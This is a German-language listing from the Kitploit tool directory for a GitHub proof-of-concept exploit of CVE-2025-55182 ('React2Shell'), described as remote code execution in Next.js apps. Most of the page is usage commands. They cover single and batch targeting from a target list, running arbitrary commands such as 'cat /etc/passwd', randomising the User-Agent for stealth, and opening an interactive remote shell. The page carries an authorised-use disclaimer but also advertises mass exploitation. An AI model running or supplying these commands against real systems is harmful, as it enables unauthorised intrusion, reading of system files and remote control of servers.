Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182-React2Shell-RCE-Shell — CVE-2025-55182 – React2Shell: Proof-of-Concept-Exploit für Remote Code Execution (RCE) in Next.js-Apps. Bietet eine interaktive Shell-Eingabeaufforderung, um die Schwachstelle in Echtzeit zu testen und zu demonstrieren. Nur für Sicherheitsforschung und autorisierte Penetrationstests verwenden. | Kitploit
Tools/GitHubGitHub/m4xsec/cve-2025-55182-react2shell-rce-shell
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubm4xsec/cve-2025-55182-react2shell-rce-shell

CVE-2025-55182-React2Shell-RCE-Shell

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Repository anzeigen
81vor 8 MonatenNoch nicht geprüft

CVE-2025-55182 – React2Shell: Proof-of-Concept-Exploit für Remote Code Execution (RCE) in Next.js-Apps. Bietet eine interaktive Shell-Eingabeaufforderung, um die Schwachstelle in Echtzeit zu testen und zu demonstrieren. Nur für Sicherheitsforschung und autorisierte Penetrationstests verwenden.

Teilen

‼️ CVE-2025-55182 Pwn React2Shell RCE Exploit mit interaktiver Shell-Eingabeaufforderung & Massenausnutzung

Dieses Repository bietet einen funktionierenden Proof-of-Concept für CVE-2025-55182, eine RCE-Schwachstelle, die einige Bereitstellungen von Next.js betrifft. Das Tool öffnet bei Ausnutzung eine interaktive Shell-Eingabeaufforderung, sodass Sicherheitsforscher die Ausnutzbarkeit testen und verifizieren können. Verwenden Sie es verantwortungsvoll und nur gegen autorisierte Ziele.

poc

🕸️ VERWENDUNG:

root@kitploit:~
# Getting Started
git clone https://github.com/M4xSec/CVE-2025-55182-React2Shell-RCE-Shell/
cd /CVE-2025-55182-React2Shell-RCE-Shell/
python3 CVE-2025-55182-exploit.py 

# Single target (default mode)
python3 CVE-2025-55182-exploit.py -u http://target.com

# Target on localhost + specify callback / proxy URL (if applicable)
python3 CVE-2025-55182-exploit.py -u http://localhost:3000 -p http://127.0.0.1:8080

# Use HTTPS target and skip certificate verification (if applicable)
python3 CVE-2025-55182-exploit.py -u https://target.com -k

# Batch mode: supply list of targets (one per line)
python3 CVE-2025-55182-exploit.py -l targets.txt

# Custom command execution on target
python3 CVE-2025-55182-exploit.py -u http://target.com --custom "id"

python3 CVE-2025-55182-exploit.py -u http://target.com --custom "cat /etc/passwd"

python3 CVE-2025-55182-exploit.py -u http://target.com --custom "uname -a" -v

# Provide additional headers if needed (e.g. custom cookies)
python3 CVE-2025-55182-exploit.py -u http://target.com -H "Cookie: session=abc123" --custom "ps aux"

# Batch + custom commands (multiple commands separated with semicolon)
python3 CVE-2025-55182-exploit.py -l targets.txt --custom "whoami; id; pwd"

# Only output the payload without executing (payload-only mode)
python3 CVE-2025-55182-exploit.py -u http://target.com --custom "cat /etc/passwd" --payload-only

# Use a random User-Agent header for evasion / stealth
python3 CVE-2025-55182-exploit.py -u http://target.com --random-agent

python3 CVE-2025-55182-exploit.py -l targets.txt --random-agent -k

# Interactive shell mode (if exploit succeeds)
python3 CVE-2025-55182-exploit.py -u http://target.com --shell
Tool herunterladen